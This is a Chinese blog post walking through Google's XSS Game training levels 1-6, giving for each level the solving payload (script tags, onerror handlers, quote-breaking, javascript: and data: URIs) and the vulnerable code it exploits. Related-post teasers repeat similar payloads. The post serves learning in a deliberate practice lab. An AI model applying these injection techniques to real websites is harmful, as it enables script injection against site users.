XSS game -xss学习

最新推荐文章于 2024-04-30 05:17:19 发布
最新推荐文章于 2024-04-30 05:17:19 发布
阅读量626 收藏
点赞数
分类专栏: xss学习 文章标签: XSS game -xss学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/127989073
版权

网址

https://xss-game.appspot.com/level1

Level 1: Hello, world of XSS

payload:

<script> alert(1); </script>

漏洞产生处:

message = "Sorry, no results were found for <b>" + query + "</b>."

Level 2: Persistence is key

payload:

<img src=1 onerror=alert(1);>

漏洞产生处:

html += "<blockquote>" + posts[i].message + "</blockquote";

blockquote 标签之间的所有文本都会从常规文本中分离出来,块引用拥有它们自己的空间。
<script> 执行不了那就换个标签。

Level 3: That sinking feeling…

payload:

'onerror=alert(1);>

漏洞产生处:

var html = "Image " + parseInt(num) + "<br>";
html += "<img src='/static/level3/cloud" + num + ".jpg' />";

利用单引号闭合绕过。

Level 4:Context matters

payload:

3'*alert(1));//

漏洞产生处:
很明确,用单引号闭合,然后再乘 alert(1) ,那么这样的话它会先执行 alert(1),然后再把返回值执行 startTimer

<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />

Level 5: Breaking protocol

payload:

signup?next=javascript:alert()			//之后点击 next 链接
或者
confirm?next=javascript:alert()

在这里插入图片描述
漏洞产生处:
level.py 处可以看到传了一个 next 参数到 signup.html 处。
在这里插入图片描述
这边可以用 javascript: 伪协议执行 js 语句
在这里插入图片描述
当然直接 confirm?next=javascript:alert() 也是可以的。
在这里插入图片描述
这边也可以用 javascript: 伪协议执行 js 语句。
在这里插入图片描述

Level 6: Follow the 🐇

payload:

https://xss-game.appspot.com/level6/frame#data:text/javascript,alert('XSS')

漏洞产生处:
index.html 中可以看出 url 格式的要求

  1. https 开头
  2. 获取的是 # 后面的 url

在这里插入图片描述

在这里插入图片描述
onload 会加载 js 文件并执行,那么我们可不可以利用 data 伪协议直接加载 js 代码,答案是可以的。

在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记录xss练习 level1-level5(一)
CN_DS的博客
11-28 1006
练习网址:http://test.xss.tv/ 本人菜鸟一枚,如有分析不对的地方,望前辈们指正。 话不投机....不对,话不多说直接上图,上分析。 level1:很简单的一道题,从URL中我们可以分析到,xxx/level1.php?name=test,有一个参数;然后在firebug或源码页面找到它所在的位置,发现只有一处,在<h1></h1>标签内,直接一‘脚’...
学习笔记——偶然之间发现的xss靶场
牟先生的学习博客
07-27 174
今天在看大佬文章的时候,发现一个xss的在线网站:地址。 事情就从这里开始啦!!! level1 : Hello, world of XSS 第一关非常简单,是产生xss漏洞最为常见的原因,用户的输入未经任何转义直接包含显示在页面中。 只要输入<script>alert()</script>即可。 level2 : Persistence is Key Web应用程序通常将用户数据保存在服务器端,并且越来越多地将客户端数据库放在客户端数据库中,然后将其显示给用户。无论用户
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程
热门推荐
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
2401_84186109的博客
04-30 608
3)第三步:弹窗测试,回车即可弹窗,自动进入下一关。4)从源码可以看到,第一关没有任何过滤。​​​​​​​​。
Google XSS Game Level 6 通关方式
bao
03-19 428
图中给到的一个错误信息就是解题关键,检查元素查看 这个iframe 后面是有一段js文件地址,但是这个js文件并不存在。大概意思是通过 XHR / URL 请求之类的方式插入一个 js 文件/脚本来弹出一个 alert。Github 为例:需要点击 Raw 之后 取地址栏的链接(这才是真正的文件地址)在自己的服务器 或者 Github 上面放一个 js 文件,脚本主要是弹出框。到这里,js加载完成就成功啦。当 url 改变之后才会刷新,有时候并不起作用。查看源代码,该链接还需要是 https 的。
XSS Game通关教程
自强不息
02-03 694
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
xssgame.zip
06-10
xss小游戏靶场
xss游戏平台源码
12-12
xss游戏平台源码
xss game挑战笔记.pdf
02-11
xss game挑战笔记
elm-game-state:指导
04-25
我为使用的体系结构很好地为游戏提供了服务,因此我想尽快对其进行描述。 目标是能够以平坦的... <3 xss=removed> GameState ) -- don't change anything | DeltaNone -- change more than one thing -- (useful for
学习网站1
08-08
同时,Firing Range、XSS Challenges和XSS Game提供了更多的训练环境,让你可以通过解决实际问题来增强对XSS防御的理解。 SQL注入则是另一种常见的Web应用漏洞,攻击者通过输入恶意的SQL语句,欺骗服务器执行非预期...
XSSGAME小游戏(XSS学习)level1-15
qq_62078839的博客
07-22 2543
XSS源码下载本地搭建。
XSS-Game Level1,XSS-Game 第一关
2301_81694225的博客
04-12 848
我最近从朋友那里收集到了2020-2021BAT 面试真题解析Android 基础、Java 基础、Android 源码相关分析、常见的一些原理性问题等等,可以很好地帮助大家深刻理解Android相关知识点的原理以及面试相关知识。这份资料把大厂面试中常被问到的技术点整理成了PDF,包知识脉络 + 诸多细节;还有 高级架构技术进阶脑图 帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习,也可以分享给身边好友一起学习。这里也分享给广大面试同胞们,希望每位程序猿们都能面试成功~
不是我说,只要你把这个游戏通关了,XSS漏洞你就搞清楚了
一个安全研究员
02-20 772
xss小游戏
XSS实战训练————XSSGame挑战赛
Fly_鹏程万里
12-13 1535
前言 这是一个国外的XSS游戏平台,一共6关,在玩的时候需要挂VPN!如果在游戏的过程当中需要查看源代码或者提示可以在输入框下面点击相应的功能进入相应的选项哦! 平台地址:https://xss-game.appspot.com 过关录 Leve 1 特点:未进行严格的过滤,可以直接构造xss payload实现xss攻击 查看源代码 page_header = """ &...
有意思的游戏:Google XSS Game
横云断岭的专栏
05-31 5395
Google最近出了一个XSS的游戏: https://xss-game.appspot.com/ 我这个菜鸟看提示,花了两三个小时才全过了。。 这个游戏的规则是只要在攻击网页上弹出alert窗口就可以了。 题目页面是在iframe里嵌套的展现的,那么父窗口是如何知道iframe里成功弹出了窗口? 是这样子实现的: 题目页面加载了这个js,改写了alert函数,当alert被调
XSS小游戏
迷风小白
06-08 5314
XSS小游戏源码:源码下载 LEVEL1 level1.php payload: http://127.0.0.1/xss/level1.php?name=< script>alert(1)</script> LEVEL2 level2.php 在输入框那里存在xss漏洞,因此只需闭合前面的双引号即可 payload: http://127.0.0.1/xs...
0x01-XSS基础实战-XSSGame 6集全
0pr
06-03 549
目录 这是什么? 今日目标 Level 1 Level 2 innerHTML innerHTML的安全问题 Event Level 3 location.hash Level 4 Level 5 Level 6 Protocol-relative URLs DataURLs 总结 参考链接 这是什么? XSS 系列开篇。WebApp 渗透测试是一个大话题,之前的 SQL 系列之后还会继续深入。本篇的 XSS 系列也一样,在后续的工作学习中,不断记录。 我不再讲 XSS 的基本
xssgame靶场搭建
最新发布
05-17
你可以在GitHub上下载XSS Game靶场的源代码:https://github.com/google/security-research-pocs/tree/master/web-platform/xss-game 2. 安装和配置Web服务器 你需要安装和配置Web服务器来托管XSS Game靶场。你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值